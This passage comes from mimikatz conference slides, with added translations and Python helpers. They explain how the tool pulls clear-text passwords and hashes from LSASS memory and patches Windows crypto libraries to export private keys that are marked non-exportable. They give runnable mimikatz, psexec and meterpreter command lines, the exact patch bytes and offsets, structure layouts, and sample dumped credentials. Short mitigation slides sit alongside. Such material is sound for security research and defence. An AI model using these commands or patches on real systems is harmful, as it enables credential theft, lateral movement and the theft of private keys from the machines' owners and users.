  kerberos (nt5)   | kerberos!KerbLogonSessionList                            | LIST_ENTRY
  kerberos (nt6)   | kerberos!KerbGlobalLogonSessionTable                     | RTL_AVL_TABLE
  msv1_0           | lsasrv!LogonSessionList, lsasrv!LogonSessionListCount    | LIST_ENTRY, ULONG

Protection Keys

  Key (NT 5) | Symbols
  -----------|------------------------------------------------
  RC4        | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx       | lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key (NT 6) | Symbols
  -----------|------------------------------------------------
  (IV)       | lsasrv!InitializationVector
  3DES       | lsasrv!h3DesKey
  AES        | lsasrv!hAesKey
mimikatz :: sekurlsa :: memo

Some commands:
  mimikatz # privilege::debug
  mimikatz # sekurlsa::logonPasswords full
  mimikatz # exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
  mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

  mimikatz # sekurlsa::logonPasswords full

  Authentification Id         : 0;234870
  Package d'authentification  : NTLM
  Utilisateur principal       : Gentil Kiwi
  Domaine d'authentification  : vm-w8-rp-x
          msv1_0 :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
           * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
          kerberos :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Mot de passe : waza1234
          wdigest :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Mot de passe : waza1234
          tspkg :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Mot de passe : waza1234
          livessp :
           * nt (LUID KO)

(The tool speaks French: "Demande d'ACTIVATION du privilège" = privilege activation request, "Utilisateur" = user, "Domaine" = domain, "Mot de passe" = password. One logon session yields the LM/NTLM hashes from msv1_0 and the same clear-text password from kerberos, wdigest and tspkg.)
mimikatz :: sekurlsa :: what we can do?

Basics
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights / system rights / debug privilege (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;)
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights / system rights / debug privilege, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take the opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?

A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • even those which are "not" exportable

What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys, in PVK format (it's cool, OpenSSL can deal with it too)
– Patch
  • CryptoAPI, in the mimikatz context
  • CNG, in the LSASS context (again ;)
mimikatz :: crypto :: how it's protected? (module: mod_mimikatz_crypto)

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • at least not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (e.g. a session is opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Diagram annotations: the password/popup protection is a constraint for most users, and unavailable for computer keys.)

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard readers, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported? (… level)

Flow (diagram):
  Process → CryptoAPI and RSA CSP, in the same process: Load Private Key (DPAPI decode)
  → Ask to export Key → Exportable?
      yes → Exported Key
      no  → NTE_BAD_KEY_STATE
  (the exportability check is labelled "PLAYSKOOL" on the diagram)
mimikatz :: crypto :: patch::capi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.
  mimikatz # crypto::exportCertificates
  Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
   - Benjamin Delpy
          Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
          Provider       : Microsoft Enhanced Cryptographic Provider v1.0
          Type           : AT_KEYEXCHANGE
          Exportabilité  : NON
          Taille clé     : 2048
          Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
          Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificat 0 ================
  Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
  Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Objet : CN=Benjamin Delpy, C=FR
  Il ne s'agit pas d'un certificat racine
  Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
    Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
  La clé privée NE PEUT PAS être exportée
  Succès du test de cryptage
  CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
  CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(Both mimikatz and certutil report the same thing: "Exportabilité : NON" / "La clé privée NE PEUT PAS être exportée" = the private key cannot be exported; the private export fails with 0x8009000b, NTE_BAD_KEY_STATE, "key not valid for use in specified state"; only the public DER export succeeds. Diagram label: Exportable.)
mimikatz :: crypto :: patch::capi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
Before / after, in rsaenh (the conditional jump becomes an unconditional one of the same length):

  .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
  .text:0AC0B7CB 90                   nop
  .text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

  .text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
  .text:0AC1F749 90                   nop
  .text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch::capi :: demo time

Import, export, import as not exportable… export!
mimikatz :: crypto :: patch::capi :: limitations

Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works?

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
Processes use RPC to call the "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported? (… level)

Flow (diagram):
  Process → CNG → RPC → KeyIso Service (LSASS process): Load Private Key (DPAPI decode)
  → Ask to export Key → Exportable?
      yes → Exported Key (returned to the process over RPC)
      no  → NTE_NOT_SUPPORTED
  (the check is again labelled "PLAYSKOOL"; on NT6, LSASS is a System-protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP)
mimikatz :: crypto :: patch::cng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey inside lsass (the keyiso service).
This function does all the work to prepare the export, and checks if the key is exportable.
  mimikatz # crypto::exportKeys
  [user] Clés CNG :
   - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
          Exportabilité : NON
          Taille clé    : 2048
          Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.

(The CNG key is marked not exportable; the private export fails with 0x80090029, NTE_NOT_SUPPORTED, "the requested operation is not supported". Diagram label: Exportable.)
mimikatz :: crypto :: patch::cng :: because sometimes I own LSASS

This time, the checks and the keys are in the LSASS process… and what?
I wrote "1" byte in LSASS memory space…
Before / after, in ncrypt inside lsass:

  .text:6C815210 75 1C    jnz  short continue_key_export
  .text:6C815210 EB 1C    jmp  short continue_key_export
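Why both rewrites (the 6-byte `jnz rel32` → `nop ; jmp rel32` in rsaenh, the 2-byte `jnz rel8` → `jmp rel8` in ncrypt) work without recomputing anything: each replacement has exactly the length of the original, so the instruction that follows starts at the same address and the relative displacement still points at the same target. The following Python is an added worked example, not code from the deck or from mimikatz; it only decodes and rewrites the bytes offline, never touching a process, and the addresses and bytes are the ones shown in the two listings.

```python
import struct


def decode_branch(va, code, off=0):
    """Decode one instruction at code[off], located at virtual address `va`.

    Only nop, jnz rel8/rel32 and jmp rel8/rel32 are understood, which is all
    the patch sites use. Returns (mnemonic, length, target); target is None
    for nop. Targets are wrapped to 32 bits (the listings are x86).
    """
    b0 = code[off]
    if b0 == 0x90:                                      # nop
        return ("nop", 1, None)
    if b0 == 0x0F and code[off + 1] == 0x85:            # jnz rel32
        rel = struct.unpack_from("<i", code, off + 2)[0]
        return ("jnz", 6, (va + 6 + rel) & 0xFFFFFFFF)
    if b0 == 0xE9:                                      # jmp rel32
        rel = struct.unpack_from("<i", code, off + 1)[0]
        return ("jmp", 5, (va + 5 + rel) & 0xFFFFFFFF)
    if b0 in (0x75, 0xEB):                              # jnz rel8 / jmp rel8
        rel = struct.unpack_from("<b", code, off + 1)[0]
        return ("jnz" if b0 == 0x75 else "jmp", 2, (va + 2 + rel) & 0xFFFFFFFF)
    raise ValueError("unsupported opcode 0x%02x at 0x%08x" % (b0, va))


def decode_all(va, code):
    """Decode a short byte run starting at `va`; returns [(va, mnemonic, target), ...]."""
    out, off = [], 0
    while off < len(code):
        mnemonic, length, target = decode_branch(va + off, code, off)
        out.append((va + off, mnemonic, target))
        off += length
    return out


def force_branch(code):
    """Rewrite a jnz so the 'continue export' path is always taken.

    0F 85 xx xx xx xx (jnz rel32, 6 bytes) -> 90 E9 xx xx xx xx (nop ; jmp rel32)
    75 xx             (jnz rel8,  2 bytes) -> EB xx             (jmp rel8)
    The length is preserved, so the displacement bytes are copied unchanged.
    """
    if len(code) == 6 and code[:2] == b"\x0f\x85":
        return b"\x90\xe9" + code[2:]
    if len(code) == 2 and code[0] == 0x75:
        return b"\xeb" + code[1:]
    raise ValueError("not a jnz")


def patched_target_unchanged(va, original):
    """True when the rewrite keeps both the length and the branch target."""
    patched = force_branch(original)
    old = [t for _, _, t in decode_all(va, original) if t is not None]
    new = [t for _, _, t in decode_all(va, patched) if t is not None]
    return len(patched) == len(original) and old == new


# The three sites from the listings: rsaenh (patch::capi) and ncrypt (patch::cng).
CAPI_SITES = {
    0x0AC0B7CB: bytes.fromhex("0F8533C7FFFF"),
    0x0AC1F749: bytes.fromhex("0F85B63BFFFF"),
}
CNG_SITE = {0x6C815210: bytes.fromhex("751C")}

if __name__ == "__main__":
    for va, code in list(CAPI_SITES.items()) + list(CNG_SITE.items()):
        for label, run in (("before", code), ("after ", force_branch(code))):
            for ins_va, mnemonic, target in decode_all(va, run):
                tgt = "" if target is None else "-> 0x%08x" % target
                print("%s 0x%08x %-3s %s" % (label, ins_va, mnemonic, tgt))
```

Running it prints, for each site, the original jnz and the patched nop/jmp pair resolving to the same target (0x0AC07F04 and 0x0AC13305 for rsaenh, 0x6C81522E for ncrypt); `patched_target_unchanged` is the check you would run before writing anything into a process.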
mimikatz :: crypto :: patch::cng :: demo time

Import, export, import as not exportable… export again!
mimikatz :: crypto :: patch::cng :: limitations

The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC snap-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz :: crypto :: patch::cng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil
Before the patch:

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
  ================ Certificat 1 ================
  […]
  Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Fournisseur = Microsoft Software Key Storage Provider
  La clé privée NE PEUT PAS être exportée
  Succès du test de chiffrement
  CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
  CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After crypto::patchcng:

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
  ================ Certificat 1 ================
  […]
  Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Fournisseur = Microsoft Software Key Storage Provider
  Succès du test de chiffrement
  CertUtil: -exportPFX La commande s'est terminée correctement.

(First run: "the private key CANNOT be exported", and the export fails with 0x8009000b. Second run, same command, same user: "the command completed successfully".)
mimikatz :: crypto :: memo

Some commands:
  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

  mimikatz # privilege::debug
  mimikatz # crypto::patchcng
  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # crypto::exportKeys
  mimikatz # exit

Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?

Exactly the same as for sekurlsa: it will prevent access to accounts/computers
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List notifications (process, thread, image, registry)
– List object hooks and procedures
– …
…
mimikatz :: that's all folks!

Thanks to / Merci à
– my girlfriend, for her support (her LSASS crashed a few times)
– Application Security Forum, for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community, for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
…especially if you have written down the corresponding slide number
Blog, Source Code & Contact

blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg :: symbols & theory

Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario:
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear-text credentials…
  kd> x tspkg!*clear*
  75016d1c  tspkg!TSObtainClearCreds = <no type information>
  kd> x tspkg!*password*
  75011b68  tspkg!TSDuplicatePassword = <no type information>
  75011cd4  tspkg!TSHidePassword = <no type information>
  750195ee  tspkg!TSRevealPassword = <no type information>
  75012fbd  tspkg!TSUpdateCredentialsPassword = <no type information>
  kd> x tspkg!*locate*
  7501158b  tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow

Flow (diagram): LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;    /* domain */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;   /* protected with LsaProtectMemory */
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time

  mimikatz # sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest

because clear-text passwords over http/https are not cool
mimikatz :: sekurlsa :: wdigest :: what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]" – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP" – Microsoft, http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool:
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • only with Advanced Digest authentication
mimikatz sekurlsa wdigest – what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
The WDigest provider must therefore keep the elements needed to compute responses for different servers:
– Username
– Realm (from server)
– Password
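Added example (not from the deck): the Digest computation of this slide in Python, run on the RFC 2617 sample values, to show why a client-side provider cannot precompute HA1 for a server whose realm it has not yet seen.

```python
import hashlib


def _md5_hex(s: str) -> str:
    """The H() of RFC 2617: MD5 over the bytes of s, hex encoded."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is chosen by the
    server, so HA1 depends on which server is being talked to."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop="auth" (or no qop at all)."""
    return _md5_hex(f"{method}:{digest_uri}")


def digest_response(username, realm, password, nonce, method, digest_uri,
                    qop=None, nc=None, cnonce=None) -> str:
    """Client response: MD5(HA1:nonce:HA2) in the RFC 2069 form, or
    MD5(HA1:nonce:nc:cnonce:qop:HA2) when the server offered a qop."""
    h1 = ha1(username, realm, password)
    h2 = ha2(method, digest_uri)
    if qop is None:
        return _md5_hex(f"{h1}:{nonce}:{h2}")
    return _md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


def ha1_per_realm(username: str, password: str, realms) -> dict:
    """What a provider would have to cache instead of the password: one HA1
    per realm. A realm first seen after logon is not in the cache, which is
    the reason WDigest keeps the password itself."""
    return {r: ha1(username, r, password) for r in realms}


if __name__ == "__main__":
    # Sample values from RFC 2617 section 3.5 (username Mufasa).
    resp = digest_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                           "dcd98b7102dd2f0e8b11d0f600bfb0c093",
                           "GET", "/dir/index.html",
                           qop="auth", nc="00000001", cnonce="0a4f113b")
    print(resp)
    # Two servers, two realms: the same password gives two different HA1s.
    print(ha1_per_realm("Mufasa", "Circle Of Life",
                        ["testrealm@host.com", "other-realm@host.com"]))
```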
mimikatz sekurlsa wdigest – theory
This time we know:
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList
.text:7409D151  _DigestCalcHA1@8        call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest – workflow
[diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for that LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
	struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
	struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
	DWORD UsageCount;
	struct _KIWI_WDIGEST_LIST_ENTRY *This;
	LUID LocallyUniqueIdentifier;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
	[…]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz sekurlsa wdigest – demo time
sekurlsa::wdigest
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
mimikatz sekurlsa livessp – how?
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbol searching
~ Boring ~… let's be more brutal this time: set a WinDBG trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz sekurlsa livessp – how?
Let's log in with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Stacks caught by the trap (kc 5):
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah, Pass the Hash capability with a Live account too…
A Live user can log on through RDP via SSO
mimikatz sekurlsa livessp – workflow
[diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for that LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL) → LsaUnprotectMemory → password in clear]
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz sekurlsa kerberos
Let's log in with a normal account
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
Stacks caught by the trap (kc 5):
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
→ Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
→ Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6) – workflow
[diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5) – workflow
[diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for that LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa – demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa kerberos – "hu?"
OK. It works…
But why?
